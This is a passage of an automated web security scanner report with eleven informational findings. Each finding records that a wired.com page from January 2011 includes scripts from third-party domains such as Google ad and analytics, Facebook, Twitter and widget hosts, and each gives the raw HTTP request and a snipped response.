Confidence:	Certain
Host:	http://www.wired.com
Path:	/techbiz/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /techbiz/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=525
Expires: Wed, 12 Jan 2011 15:47:05 GMT
Date: Wed, 12 Jan 2011 15:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.108. http://www.wired.com/thisdayintech/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/thisdayintech/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /thisdayintech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:01:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:12 GMT
Date: Wed, 12 Jan 2011 15:40:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<div class="textwidget"><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.109. http://www.wired.com/threatlevel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:21:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:52 GMT
Date: Wed, 12 Jan 2011 15:27:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.110. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2006/04/reporter_vs_sub/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2006/04/reporter_vs_sub/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:06:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=600
Expires: Wed, 12 Jan 2011 15:37:41 GMT
Date: Wed, 12 Jan 2011 15:27:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.111. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/hacking-the-hacker-stereotypes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2010/12/hacking-the-hacker-stereotypes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 11:38:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=32
Expires: Wed, 12 Jan 2011 15:33:15 GMT
Date: Wed, 12 Jan 2011 15:32:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.112. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/transcending-the-human-diy-style/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2010/12/transcending-the-human-diy-style/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:54 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=51
Expires: Wed, 12 Jan 2011 15:33:23 GMT
Date: Wed, 12 Jan 2011 15:32:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.113. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:48:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=39
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:32:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.114. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/birgitta-jonsdottir/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/birgitta-jonsdottir/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:07:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=382
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.115. http://www.wired.com/threatlevel/2011/01/codebreakers-death/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/codebreakers-death/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/codebreakers-death/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:44:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=380
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/codebreakers-death/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.116. http://www.wired.com/threatlevel/2011/01/dubai-assassination/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/dubai-assassination/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/dubai-assassination/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 07:01:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=335
Expires: Wed, 12 Jan 2011 15:33:00 GMT
Date: Wed, 12 Jan 2011 15:27:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/dubai-assassination/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.117. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/secret-tanning-camera/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/secret-tanning-camera/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:42:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=330
Expires: Wed, 12 Jan 2011 15:32:52 GMT
Date: Wed, 12 Jan 2011 15:27:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.118. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/vf-wikieaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/vf-wikieaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:50:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=378
Expires: Wed, 12 Jan 2011 15:33:32 GMT
Date: Wed, 12 Jan 2011 15:27:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86522

